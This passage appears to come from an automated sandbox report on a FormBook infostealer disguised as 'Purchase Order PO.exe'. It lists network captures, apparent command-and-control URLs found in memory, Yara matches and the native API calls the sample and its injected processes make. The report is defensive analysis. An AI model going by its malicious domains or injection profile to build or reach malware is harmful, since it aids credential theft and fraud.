66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 14:33:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOIOa9kgfaxUv8pEIxqyFDjjddKR1Vz7IxkD4J7VYWV6RibOJpLPSvQr9wovgC9C3tP7%2BbPk1xAgYwyIK2inI1meDKB1ywH%2BQDA3tmfKsWfuBM6PMS4IvVapcu49VX5WJegGrlI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e92d5a9ba5a0cae-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1542&rtt_var=771&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=631&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 14:33:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ERCbM3avfPexHHhqjbVzPnZzos0Plqnhr9ABY72UY2o8zS5EjrpOhBRrT%2Fnp6hitSGN1gvSzzySQwP6e%2F8Yl17SplZ882aidqPE1cXySKfa5%2FpRkaWCgFzgXL5ji1acMa6k1Vc8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e92d5ba2e928c89-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=651&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 14:33:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHyH0WLGHpHX27VJmGFXFTEf9VfndHih1prS2yDx8aNSMvbiRzyQqfc6ue44LZZILAShNfD2W3RCiYDMykU44rvYGa4B8%2F%2BqsXQxTPz31vxErFColDdJz19Cz8OiWrS1iOzAjic%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e92d5caee2f7ca8-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2093&min_rtt=2093&rtt_var=1046&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1668&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 14:33:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Xltn0lpvpCSiCXJtnYaeYB8h1atQr85Pbq5LAWWbZODZg2en2m%2BnpcL4x4tpWrpHDczoGEEmwPZrD3Ob4DQEKRzdVUi3kInBiJi6I9y5YcJjjKaZKS6gZgsjHRmR8rJcTE2%2Bx0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e92d5dbe8418c95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1799&rtt_var=899&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=368&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frien
                      Source: GDDZlGeaCapsK.exe, 00000008.00000002.3286346914.000000000577E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.goldstarfootwear.shop
                      Source: GDDZlGeaCapsK.exe, 00000008.00000002.3286346914.000000000577E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.goldstarfootwear.shop/8m07/
                      Source: GDDZlGeaCapsK.exe, 00000008.00000002.3284706546.00000000039E8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/6ou6/?VF=6pChKdZP-&aX8p=We72k2U8RqyHNx9c0lgrcMajP
                      Source: isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: Purchase Order PO.exeString found in binary or memory: https://cdn.pixabay.com/photo/2017/02/12/21/29/false-2061132_640.png
                      Source: isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: isoburn.exe, 00000006.00000002.3282862649.0000000003219000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2614192724.000000000323E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: isoburn.exe, 00000006.00000002.3282862649.0000000003219000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2614192724.000000000323E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: isoburn.exe, 00000006.00000002.3282862649.0000000003219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: isoburn.exe, 00000006.00000003.2614192724.000000000323E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                      Source: isoburn.exe, 00000006.00000002.3282862649.0000000003219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: isoburn.exe, 00000006.00000002.3282862649.0000000003219000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2614192724.000000000323E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: isoburn.exe, 00000006.00000002.3282862649.0000000003219000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2614192724.000000000323E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: isoburn.exe, 00000006.00000003.2613279512.0000000007F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: isoburn.exe, 00000006.00000002.3285673659.0000000005AC6000.00000004.10000000.00040000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000008.00000002.3284706546.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cstrategy.online/qx5d/?aX8p=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC
                      Source: isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: isoburn.exe, 00000006.00000003.2622123219.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3284014687.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3284352554.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2438402201.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3286346914.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3284154909.0000000003170000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2439723626.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      .NET source code contains very large strings
                      Source: Purchase Order PO.exe, frmBandaMusical.csLong String: Length: 144230
                      Source: 6.2.isoburn.exe.554cd14.2.raw.unpack, frmBandaMusical.csLong String: Length: 144230
                      Source: 8.2.GDDZlGeaCapsK.exe.32dcd14.1.raw.unpack, frmBandaMusical.csLong String: Length: 144230
                      Source: 8.0.GDDZlGeaCapsK.exe.32dcd14.1.raw.unpack, frmBandaMusical.csLong String: Length: 144230
                      Source: 9.2.firefox.exe.2370cd14.0.raw.unpack, frmBandaMusical.csLong String: Length: 144230
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Purchase Order PO.exe
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0042C663 NtClose,3_2_0042C663
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2B60 NtClose,LdrInitializeThunk,3_2_00FC2B60
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00FC2C70
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_00FC2DF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC35C0 NtCreateMutant,LdrInitializeThunk,3_2_00FC35C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC4340 NtSetContextThread,3_2_00FC4340
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC4650 NtSuspendThread,3_2_00FC4650
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2AF0 NtWriteFile,3_2_00FC2AF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2AD0 NtReadFile,3_2_00FC2AD0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2AB0 NtWaitForSingleObject,3_2_00FC2AB0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2BF0 NtAllocateVirtualMemory,3_2_00FC2BF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2BE0 NtQueryValueKey,3_2_00FC2BE0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2BA0 NtEnumerateValueKey,3_2_00FC2BA0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2B80 NtQueryInformationFile,3_2_00FC2B80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2CF0 NtOpenProcess,3_2_00FC2CF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2CC0 NtQueryVirtualMemory,3_2_00FC2CC0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2CA0 NtQueryInformationToken,3_2_00FC2CA0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2C60 NtCreateKey,3_2_00FC2C60
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2C00 NtQueryInformationProcess,3_2_00FC2C00
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2DD0 NtDelayExecution,3_2_00FC2DD0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2DB0 NtEnumerateKey,3_2_00FC2DB0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2D30 NtUnmapViewOfSection,3_2_00FC2D30
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2D10 NtMapViewOfSection,3_2_00FC2D10
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2D00 NtSetInformationFile,3_2_00FC2D00
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2EE0 NtQueueApcThread,3_2_00FC2EE0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2EA0 NtAdjustPrivilegesToken,3_2_00FC2EA0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2E80 NtReadVirtualMemory,3_2_00FC2E80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2E30 NtWriteVirtualMemory,3_2_00FC2E30
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2FE0 NtCreateFile,3_2_00FC2FE0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2FB0 NtResumeThread,3_2_00FC2FB0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2FA0 NtQuerySection,3_2_00FC2FA0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2F90 NtProtectVirtualMemory,3_2_00FC2F90
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2F60 NtCreateProcessEx,3_2_00FC2F60
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2F30 NtCreateSection,3_2_00FC2F30
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC3090 NtSetValueKey,3_2_00FC3090
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC3010 NtOpenDirectoryObject,3_2_00FC3010
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC39B0 NtGetContextThread,3_2_00FC39B0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC3D70 NtOpenThread,3_2_00FC3D70
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC3D10 NtOpenProcessToken,3_2_00FC3D10
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE4650 NtSuspendThread,LdrInitializeThunk,6_2_04EE4650
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE4340 NtSetContextThread,LdrInitializeThunk,6_2_04EE4340
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04EE2CA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2C60 NtCreateKey,LdrInitializeThunk,6_2_04EE2C60
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04EE2C70
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04EE2DF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2DD0 NtDelayExecution,LdrInitializeThunk,6_2_04EE2DD0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04EE2D30
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04EE2D10
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04EE2EE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04EE2E80
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2FE0 NtCreateFile,LdrInitializeThunk,6_2_04EE2FE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2FB0 NtResumeThread,LdrInitializeThunk,6_2_04EE2FB0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2F30 NtCreateSection,LdrInitializeThunk,6_2_04EE2F30
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2AF0 NtWriteFile,LdrInitializeThunk,6_2_04EE2AF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2AD0 NtReadFile,LdrInitializeThunk,6_2_04EE2AD0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04EE2BE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04EE2BF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04EE2BA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2B60 NtClose,LdrInitializeThunk,6_2_04EE2B60
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE35C0 NtCreateMutant,LdrInitializeThunk,6_2_04EE35C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE39B0 NtGetContextThread,LdrInitializeThunk,6_2_04EE39B0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2CF0 NtOpenProcess,6_2_04EE2CF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2CC0 NtQueryVirtualMemory,6_2_04EE2CC0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2C00 NtQueryInformationProcess,6_2_04EE2C00
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2DB0 NtEnumerateKey,6_2_04EE2DB0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2D00 NtSetInformationFile,6_2_04EE2D00
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2EA0 NtAdjustPrivilegesToken,6_2_04EE2EA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2E30 NtWriteVirtualMemory,6_2_04EE2E30
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2FA0 NtQuerySection,6_2_04EE2FA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2F90 NtProtectVirtualMemory,6_2_04EE2F90
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2F60 NtCreateProcessEx,6_2_04EE2F60
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2AB0 NtWaitForSingleObject,6_2_04EE2AB0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE2B80 NtQueryInformationFile,6_2_04EE2B80
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE3090 NtSetValueKey,6_2_04EE3090
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE3010 NtOpenDirectoryObject,6_2_04EE3010
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE3D70 NtOpenThread,6_2_04EE3D70
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE3D10 NtOpenProcessToken,6_2_04EE3D10
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EE9210 NtReadFile,6_2_02EE9210
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EE93A0 NtClose,6_2_02EE93A0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EE9300 NtDeleteFile,6_2_02EE9300
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EE90A0 NtCreateFile,6_2_02EE90A0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EE9510 NtAllocateVirtualMemory,6_2_02EE9510
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_02D842100_2_02D84210
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_02D86F920_2_02D86F92
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_02D8D5240_2_02D8D524
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_02F7838C0_2_02F7838C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_02F701300_2_02F70130
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_02F701200_2_02F70120
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_02F7A8600_2_02F7A860
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_076494D10_2_076494D1
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_076400400_2_07640040
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_076440000_2_07644000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0764C5290_2_0764C529
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0764003A0_2_0764003A
